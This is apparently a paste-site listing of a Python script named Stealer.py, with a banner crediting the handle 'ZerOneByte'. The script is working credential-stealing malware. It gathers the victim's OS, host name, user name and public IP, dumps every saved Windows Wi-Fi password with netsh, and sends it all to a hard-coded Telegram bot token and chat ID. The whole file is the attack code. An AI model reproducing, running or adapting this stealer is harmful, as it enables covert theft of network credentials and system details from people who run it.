Stealer.py 2.7 KB

12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364
  1. import telebot
  2. import platform
  3. import subprocess
  4. import getpass
  5. from requests import get
  6. import os
  7. import datetime
  8. os.system('pip install pyTelegramBotAPI')
  9. os.system('cls')
  10. banner = '''
  11. \033[1;31;40m
  12. ██████ ▄▄▄█████▓▓█████ ▄▄▄ ██▓ ▓█████ ██▀███
  13. ▒██ ▒ ▓ ██▒ ▓▒▓█ ▀▒████▄ ▓██▒ ▓█ ▀ ▓██ ▒ ██▒
  14. ░ ▓██▄ ▒ ▓██░ ▒░▒███ ▒██ ▀█▄ ▒██░ ▒███ ▓██ ░▄█ ▒
  15. ▒ ██▒░ ▓██▓ ░ ▒▓█ ▄░██▄▄▄▄██ ▒██░ ▒▓█ ▄ ▒██▀▀█▄
  16. ▒██████▒▒ ▒██▒ ░ ░▒████▒▓█ ▓██▒░██████▒░▒████▒░██▓ ▒██▒
  17. ▒ ▒▓▒ ▒ ░ ▒ ░░ ░░ ▒░ ░▒▒ ▓▒█░░ ▒░▓ ░░░ ▒░ ░░ ▒▓ ░▒▓░
  18. ░ ░▒ ░ ░ ░ ░ ░ ░ ▒ ▒▒ ░░ ░ ▒ ░ ░ ░ ░ ░▒ ░ ▒░
  19. ░ ░ ░ ░ ░ ░ ▒ ░ ░ ░ ░░ ░
  20. ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
  21. .================================================.
  22. \033[1;36;40mcontact with me
  23. Telegram : @ZerOneByte
  24. Instagram: @ZerOne.Byte
  25. Github:@ZerOne-Byte
  26. '''
  27. print(banner)
  28. #--------- TELEGRAM BOT ----------
  29. token = '1024082324:AAGOhNBtkjvzwgVQQ4H9FnYY1d8-IUubJBg'
  30. chat_id = 411099265
  31. bot = telebot.TeleBot(token)
  32. bot.send_message(chat_id,'************************')
  33. #--------- SYSTEM ----------
  34. os = platform.platform()
  35. PCname = platform.node()
  36. username = getpass.getuser()
  37. try:
  38. ip_Address = get('http://ip.42.pl/raw').text
  39. except:
  40. ip_Address='NONE'
  41. out= f'platform : {os} \nPC name : {PCname} \nUser Name : {username} \nIP Address : {ip_Address} \n'
  42. print(out)
  43. bot.send_message(chat_id,out)
  44. #--------- WIFI ---------
  45. data = subprocess.check_output(['netsh', 'wlan', 'show', 'profiles']).decode('utf-8').split('\n')
  46. profiles = [i.split(":")[1][1:-1] for i in data if "All User Profile" in i]
  47. print('*'*60)
  48. print(' SSID Password')
  49. for i in profiles:
  50. results = subprocess.check_output(['netsh', 'wlan', 'show', 'profile', i, 'key=clear']).decode('utf-8').split('\n')
  51. results = [b.split(":")[1][1:-1] for b in results if "Key Content" in b]
  52. try:
  53. out = "{:<25}| {:<}".format(i, results[0])
  54. print (out)
  55. bot.send_message(chat_id,out)
  56. except IndexError:
  57. print ("{:<25}| {:<}".format(i, ""))